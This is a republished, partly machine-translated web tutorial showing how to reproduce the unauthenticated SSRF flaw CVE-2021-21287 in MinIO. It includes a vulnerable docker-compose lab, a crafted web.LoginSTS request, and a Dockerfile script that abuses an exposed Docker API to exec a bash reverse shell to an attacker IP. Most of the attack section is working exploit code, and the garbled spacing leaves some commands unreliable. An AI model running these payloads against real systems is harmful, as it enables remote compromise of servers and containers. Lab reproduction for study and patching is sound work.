Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to analyze the MinIO unauthorized SSRF vulnerability CVE-2021-21287

2025-01-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze MinIO unauthorized SSRF vulnerability CVE-2021-21287. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

MinIO unauthorized SSRF vulnerability (CVE-2021-21287)

I. brief introduction of loopholes

Due to improper design of LoginSTS interface in MinIO components, there is a server-side request forgery vulnerability.

Attackers can initiate server-side request forgery attacks by constructing URL. Attackers who successfully exploit this vulnerability can read, update internal resources or execute arbitrary commands by using functions on the server.

The vulnerability can be exploited remotely without user authentication.

Second, influence the version

MinIO

< RELEASE.2021-01-30T00-20-58Z 三、环境准备&漏洞复现 Docker 安装 minio: docker-compose.yml version: '3.7'services: minio1: image: minio/minio:RELEASE.2021-01-16T02-19-44Z volumes: - data1-1:/data1 - data1-2:/data2 ports: - "9000:9000" environment: MINIO_ACCESS_KEY: minio MINIO_SECRET_KEY: minio123 command: server http://minio{1...4}/data{1...2} healthcheck: test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"] interval: 30s timeout: 20s retries: 3## By default this config uses default local driver,## For custom volumes replace with volume driver configuration.volumes: data1-1: data1-2: 启动环境:

Home page style:

Http://192.168.1.108:9000/minio/login

1. Verify SSRF

Specific packets:

POST / minio/webrpc HTTP/1.1Host: 192.168.1.104:1234User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79 {"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}

2. Ssrf rebounds shell

Put the file under the web service: index.php (apache)

Bounce the shell file:

DockerFile is as follows:

FROM alpine:3.13RUN apk add curl bash jqRUN set-ex & &\ {\ echo'#! / bin/bash';\ echo 'set-ex';\ echo' target= "http://192.168.1.108:2375"';\ echo 'jsons=$ (curl-s-XGET" ${target} / containers/json "| jq-r". [] | @ base64 ")' \ echo 'for item in ${jsons [@]}; do';\ echo' name=$ (echo $item | base64-d | jq-r ".Image")';\ echo'if [["$name" = = * "minio/minio" *]]; then';\ echo 'id=$ (echo $item | base64-d | jq-r ".ID")';\ echo 'break' \ echo 'fi';\ echo' done' \ echo 'execid=$ (curl-s-X POST "${target} / containers/$ {id} / exec"-H "Content-Type: application/json"-data-binary "{\" Cmd\ ": [\" bash\ ",\"-c\ ",\" bash-I > & / dev/tcp/192.168.1.104/888 0 > & 1\ "]}" | jq-r ".ID")' \ echo 'curl-s-X POST "${target} / exec/$ {execid} / start"-H "Content-Type: application/json"-data-binary "{}"';\} | bash

Specific operation packet:

POST / minio/webrpc HTTP/1.1Host: 192.168.1.104User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 79 {"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}

A short video was recorded for a good presentation.

The process is boring and the wait is long: a BGM has been added

Video:

The result of operating the video:

Https://mp.weixin.qq.com/s/9OavrcdczSZDXler5IpiQQ

Note ⚠️:

The process was not written to it because its own Docker API was turned on.

Enable Docker API reference:

Open the configuration file to find

Open the configuration file to find ExecStart=/usr/bin/dockerd and change it to ExecStart=/usr/bin/dockerd-H tcp://0.0.0.0:2375-H unix:///var/run/docker.sock restart $systemctl daemon-reload$ systemctl restart docker

The above is how to analyze the MinIO unauthorized SSRF vulnerability CVE-2021-21287. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report